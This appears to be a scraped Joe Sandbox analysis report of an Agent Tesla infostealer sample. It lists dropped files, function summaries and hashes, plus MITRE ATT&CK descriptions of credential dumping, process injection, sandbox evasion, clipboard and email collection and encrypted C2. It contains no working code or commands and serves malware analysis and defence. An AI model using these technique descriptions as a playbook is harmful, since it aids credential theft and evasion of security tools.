Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 3ae28fa2227848d1cf0272ae57b508ce0c5461cf12a6b4810c86b1f576afee6e
Instruction ID: 3dce062c991b061d4e2debfe6652bc34d9bd7cd859a77d2ef8a1dcbcf4c123de
Opcode Fuzzy Hash: 3ae28fa2227848d1cf0272ae57b508ce0c5461cf12a6b4810c86b1f576afee6e
Instruction Fuzzy Hash: C8D0C931388712BAE774AB70AC4BFE76A64EB11B51F010875BB46AA1E0D9E45842CA50

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GkYUK8VCrO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut6482.tmp

C:\Users\user\AppData\Local\Temp\aut64C1.tmp

C:\Users\user\AppData\Local\Temp\aut679E.tmp

C:\Users\user\AppData\Local\Temp\aut67CE.tmp

C:\Users\user\AppData\Local\Temp\subbase

C:\Users\user\AppData\Local\Temp\vaccinators

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
GkYUK8VCrO.exe

Function 00AA3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00AA4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00AA4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00B093DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00AA3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00AA3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00AA71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00AA3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00AA3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00AA3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 00A425F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00AA39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00A423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Function 00AA410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Function 00AC564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre